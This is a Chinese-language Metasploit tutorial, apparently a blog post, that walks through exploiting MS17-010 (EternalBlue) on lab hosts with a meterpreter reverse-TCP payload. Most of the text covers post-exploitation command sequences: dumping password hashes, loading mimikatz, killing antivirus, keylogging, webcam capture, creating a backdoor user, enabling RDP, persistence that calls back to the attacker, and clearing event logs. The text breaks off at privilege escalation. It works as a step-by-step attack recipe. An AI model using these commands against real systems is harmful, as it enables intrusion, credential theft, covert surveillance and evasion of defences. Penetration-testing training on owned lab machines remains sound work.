【MSF实战】零基础学Metasploit,看这篇就够了!

上一期我们对Metasploit有了一个简单的了解，这一期我们开始实战

一、MS17_010(永恒之蓝)

我们现在模拟使用 MS17_010 漏洞攻击，这个漏洞就是前些年危害全球的勒索病毒利用的永恒之蓝漏洞。

 1.1 查找漏洞相关模块：

• 1、在kali命令行里面输入命令msfconsole，进入msf框架中：

msfconsole#输入这个命令主要是进入msf渗透框架中

• 2、搜索MS17_010漏洞： 命令：

searchms17_010#利用search命令，搜索漏洞相关利用模块

• 这里找到了四个模块，前三个是漏洞利用模块，后两个是辅助模块，主要探测主机是否存在MS17_010漏洞。

1.2 利用 Auxiliary辅助探测模块 对漏洞进行探测：

• Auxiliary辅助探测模块 ：  该模块不会直接在攻击机和靶机之间建立访问，它们只负责执行扫描，嗅探，指纹识别等相关功能以辅助渗透测试。

• 1、使用smb_ms17_010漏洞探测模块对smb_ms17_010漏洞进行探测： 命令：

useauxiliary/scanner/smb/smb_ms17_010

• 2、查看这个模块需要配置的信息： 命令：

showoptions#查看这个模块需要配置的信息

• 3、设置要探测的远程目标： 注：RHOSTS 参数是要探测主机的ip或ip范围，我们探测一个ip范围内的主机是否存在漏洞 命令：

setrhosts192.168.100.100-192.168.100.190

• 4、对上面设置的ip范围内的主机进行攻击： 注：有+号的就是可能存在漏洞的主机，这里有2个主机存在漏洞 命令：

exploit

1.3 使用 Exploit漏洞利用模块 对漏洞进行利用：

• 1、选择漏洞攻击模块，对漏洞进行利用： 命令：

useexploit/windows/smb/ms17_010_eternalblue

• 2、查看这个漏洞的信息： 命令：

info：#查看这个漏洞的信息

• 3、查看可攻击的系统平台，显示当前攻击模块针对哪些特定操作系统版本、语言版本的系统： 命令：

showtargets

• 注：这里只有一个，有些其他的漏洞模块对操作系统的语言和版本要求的很严，比如MS08_067，这样就要我们指定目标系统的版本的。如果不设置的话，MSF会自动帮我们判断目标操作系统的版本和语言(利用目标系统的指纹特征)。

1.4 Payload攻击载荷模块：

•   攻击载荷是我们期望在目标系统在被渗透攻击之后完成的实际攻击功能的代码，成功渗透目标后，用于在目标系统上运行任意命令。

• 1、查看攻击载荷： 命令：

showpayloads#该命令可以查看当前漏洞利用模块下可用的所有Payload

• 2、设置攻击载荷： 命令：

setpayloadwindows/x64/meterpreter/reverse_tcp

• 3、查看模块需要配置的参数： 命令：

showoptions

• 4、设置攻击载荷参数： 命令：

setRHOST192.168.100.158#设置RHOST，也就是要攻击主机的ipsetLHOST192.168.100.132#设置LHOST，也就是我们主机的ip，用于接收从目标机弹回来的shellsetlport6666#设置lport，也就是我们主机的端口，反弹shell到这个端口；如果我们这里不设置lport的话，默认是4444端口监听；

• 5、进行攻击：

二、后渗透阶段

运行了 exploit命令 之后，我们开启了一个 reverse TCP监听器 来监听本地的 6666 端口，即我（攻击者）的本地主机地址（LHOST）和端口号（LPORT）。运行成功之后，我们将会看到命令提示符 meterpreter > 出现：

• Meterpreter的命令用法：

Meterpreter>?==========================================核心命令：==========================================命令说明-------------------?帮助菜单background把当前会话挂到后台运行bgbackground命令的别名bgkill杀死后台meterpreter脚本bglist列出正在运行的后台脚本bgrun执行一个meterpreter脚本作为后台线程channel显示信息或控制活动频道close关闭一个频道detach分离Meterpreter会话（用于http/https）disable_unicode_encoding禁用unicode字符串的编码enable_unicode_encoding启用unicode字符串的编码exit终止Meterpreter会话get_timeouts获取当前会话超时值guid获取会话GUIDhelp帮助菜单info显示有关Post模块的信息irb在当前会话中打开一个交互式Rubyshellload加载一个或多个Meterpreter扩展machine_id获取连接到会话的机器的MSFIDmigrate将服务器迁移到另一个进程pivot管理枢轴侦听器pry在当前会话上打开Pry调试器quit终止Meterpreter会话read从通道读取数据resource运行存储在文件中的命令run执行一个Meterpreter脚本或Post模块secure（重新）协商会话上的TLV数据包加密sessions快速切换到另一个会话set_timeouts设置当前会话超时值sleep强制Meterpreter安静，然后重新建立会话ssl_verify修改SSL证书验证设置transport管理运输机制use不推荐使用的load命令别名uuid获取当前会话的UUIDwrite将数据写入通道==========================================Stdapi：文件系统命令==========================================命令说明-------------------cat将文件内容读到屏幕上cd切换目录checksum检索文件的校验和cp将源复制到目标del删除指定文件dir列出文件（ls的别名）download下载文件或目录edit编辑文件getlwd打印本地工作目录getwd打印工作目录lcd更改本地工作目录lls列出本地文件lpwd打印本地工作目录ls列出文件mkdir制作目录mv将源移动到目标pwd打印工作目录rm删除指定文件rmdir删除目录search搜索文件show_mount列出所有挂载点/逻辑驱动器upload上传文件或目录==========================================Stdapi：网络命令==========================================命令说明-------------------arp显示主机ARP缓存getproxy显示当前代理配置ifconfig显示界面ipconfig显示接口netstat显示网络连接portfwd将本地端口转发到远程服务resolve解析目标上的一组主机名route查看和修改路由表==========================================Stdapi：系统命令==========================================命令说明-------------------clearev清除事件日志drop_token放弃任何活动的模拟令牌。execute执行命令getenv获取一个或多个环境变量值getpid获取当前进程标识符getprivs尝试启用当前进程可用的所有权限getid获取服务器运行的用户的SIDgetuid获取服务器运行的用户kill终止进程localtime显示目标系统本地日期和时间pgrep按名称过滤进程pkill按名称终止进程ps列出正在运行的进程reboot重启远程计算机reg修改远程注册表并与之交互rev2self在远程机器上调用RevertToSelf()shell放入系统命令shellshutdown关闭远程计算机steal_token尝试从目标进程窃取模拟令牌suspend暂停或恢复进程列表sysinfo获取有关远程系统的信息，例如OS==========================================Stdapi：用户界面命令==========================================命令说明-------------------enumdesktops列出所有可访问的桌面和窗口站getdesktop获取当前的meterpreter桌面idletime返回远程用户空闲的秒数keyboard_send发送击键keyevent发送按键事件keyscan_dump转储击键缓冲区keyscan_start开始捕获击键keyscan_stop停止捕获击键mouse发送鼠标事件screenshare实时观看远程用户桌面screenshot抓取交互式桌面的截图setdesktop更改meterpreters当前桌面uictl控制一些用户界面组件==========================================Stdapi：网络摄像头命令：==========================================命令说明-------------------record_mic从默认麦克风录制音频X秒webcam_chat开始视频聊天webcam_list列出网络摄像头webcam_snap从指定的网络摄像头拍摄快照webcam_stream从指定的网络摄像头播放视频流==========================================Stdapi：音频输出命令：==========================================命令说明-------------------play在目标系统上播放波形音频文件 (.wav)==========================================Priv：权限提升命令：==========================================命令说明-------------------getsystem尝试将您的权限提升到本地系统的权限。==========================================Priv：密码数据库命令：==========================================命令说明-------------------hashdump转储SAM数据库的内容==========================================Priv：Timestomp命令：==========================================命令说明-------------------timestomp操作文件MACE属性meterpreter>

• 我们输入： shell 即可切换到目标主机的 windows cmd_shell 里面： 命令：

shell#获取目标主机的cmd_shell权限chcp65001#这里为了避免目标主机cmd_shell字符乱码，设置目标主机命令行的字符编码，65001是UTF-8

• 要想从目标主机shell退出到 meterpreter ，我们只需输入： exit :

• 从 meterpreter 退出到 MSF框架 : 命令：

background#把我们获得的meterpreter会话挂载到后台运行

• 查看前面获得的 meterpreter_shell 会话，最前面的数字是会话的id： 命令：

sessions-l#查看获得的meterpreter_shell会话列表

• 输入sessions [id号]即可进入相应的 meterpreter_shell 中：

• 输入：shell即可进入 cmd 类型的控制，再输入： powershell ，即可进入 powershell 类型的控制台:

sysinfo#查看目标主机系统信息runscraper#查看目标主机详细信息runhashdump#导出密码的哈希loadkiwi#加载mimikatzps#查看目标主机进程信息pwd#查看目标当前目录(windows)getlwd#查看目标当前目录(Linux)search-f*.jsp-de:\#搜索E盘中所有以.jsp为后缀的文件downloade:\test.txt/root#将目标机的e:\test.txt文件下载到/root目录下upload/root/test.txtd:\test#将/root/test.txt上传到目标机的 d:\test\ 目录下getpid#查看当前Meterpreter Shell的进程PIDmigrate1384#将当前Meterpreter Shell的进程迁移到PID为1384的进程上idletime#查看主机运行时间getuid#查看获取的当前权限getsystem#提权,获得的当前用户是administrator才能成功runkillav#关闭杀毒软件screenshot#截图webcam_list#查看目标主机的摄像头webcam_snap#拍照webcam_stream#开视频execute参数-f可执行文件#执行可执行程序rungetgui-utest1-pAbc123456#创建test1用户，密码为Abc123456rungetgui-e#开启远程桌面keyscan_start#开启键盘记录功能keyscan_dump#显示捕捉到的键盘记录信息keyscan_stop#停止键盘记录功能uictldisablekeyboard#禁止目标使用键盘uictlenablekeyboard#允许目标使用键盘uictldisablemouse#禁止目标使用鼠标uictlenablemouse#允许目标使用鼠标load#使用扩展库run#使用扩展库runexploit/windows/local/persistencelhost=192.168.100.132lport=8888#会自动连接192.168.100.132的8888端口，缺点是容易被杀毒软件查杀portfwdadd-l9999-r192.168.100.158-p3389#将192.168.11.13的3389端口转发到本地的9999端口上，这里的192.168.100.158是获取权限的主机的ip地址clearev#清除日志

2.1 Post 后渗透模块：

•   该模块主要用于在取得目标主机系统远程控制权后，进行一系列的后渗透攻击动作。

runpost/windows/manage/migrate#自动进程迁移runpost/windows/gather/checkvm#查看目标主机是否运行在虚拟机上runpost/windows/manage/killav#关闭杀毒软件runpost/windows/manage/enable_rdp#开启远程桌面服务runpost/windows/manage/autoroute#查看路由信息runpost/windows/gather/enum_logged_on_users#列举当前登录的用户runpost/windows/gather/enum_applications#列举应用程序runpost/windows/gather/credentials/windows_autologin#抓取自动登录的用户名和密码runpost/windows/gather/smart_hashdump#dump出所有用户的hash

• 输入：sysinfo 查看目标主机的信息:

2.2 查看主机是否运行在虚拟机上:

• 查看主机是否运行在虚拟机上，可以看出主机是在虚拟机环境： 命令：

runpost/windows/gather/checkvm

2.3 关闭杀毒软件：

• 拿到目标主机的shell后第一件事就是关闭掉目标主机的杀毒软件，通过命令：

runkillav

2.4 获取目标主机的详细信息：

• 使用命令：

runscraper

它将目标机器上的常见信息收集起来然后下载保存在本地

2.5 访问文件系统：

• Meterpreter支持非常多的文件系统命令（基本跟Linux系统命令类似），一些常用命令如下：

pwd#查看当前目录cd#切换目标目录；cat#读取文件内容；rm#删除文件；edit#使用vim编辑文件ls#获取当前目录下的文件；mkdir#新建目录；rmdir#删除目录； 

2.6 上传/下载文件：

•  2.6.1 下载文件：

• 命令：

downloadfile#命令可以帮助我们从目标系统中下载文件

•  2.6.2 上传文件：

• 命令：

uploadfile#命令则能够向目标系统上传文件。

2.7 权限提升：

•   有的时候，你可能会发现自己的 Meterpreter 会话受到了用户权限的限制，而这将会严重影响你在目标系统中的活动。比如说，修改注册表、安装后门或导出密码等活动都需要提升用户权限，而Meterpreter给我们提供了一个 getsystem 命令，它可以使用多种技术在目标系统中实现提权。

• 命令：